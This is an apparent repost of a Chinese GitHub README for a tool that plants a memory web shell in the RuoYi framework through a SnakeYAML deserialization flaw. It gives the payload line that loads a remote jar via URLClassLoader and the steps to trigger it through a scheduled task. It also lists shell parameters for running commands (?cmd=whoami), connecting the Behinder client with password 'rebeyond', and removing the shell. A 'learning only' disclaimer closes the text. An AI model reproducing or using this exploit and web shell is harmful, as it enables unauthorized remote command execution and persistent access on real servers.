code-scan/yaml-payload-for-ruoyi: A memory shell for ruoyi
2021-12-18 00:14:38
Author: github.com(查看原文)
阅读量:301
收藏
This branch is up to date with main.
Contribute
-
This branch is not ahead of the upstream main.
No new commits yet. Enjoy your day!
-
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
注入方法:
把jar放到系统可以访问的地方,在定时任务创建新的定时任务,再立即执行一次即可
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["you_url_of_jar"]]]]')
若依 snakeyaml 反序列化漏洞注入内存马
RuoYi
- 直接执行命令:?cmd=whoami
- 连接冰蝎:/login?cmd=1(cmd不为空即可),密码为rebeyond,使用冰蝎正常连接即可
- 卸载内存马:?cmd=delete
RuoYi Vue
- 直接执行命令:
/dev-api/?cmd=whoami
- 连接冰蝎:暂不支持
- 卸载内存马:
/dev-api/?cmd=delete
项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
文章来源: https://github.com/code-scan/yaml-payload-for-ruoyi
如有侵权请联系:admin#unsafe.sh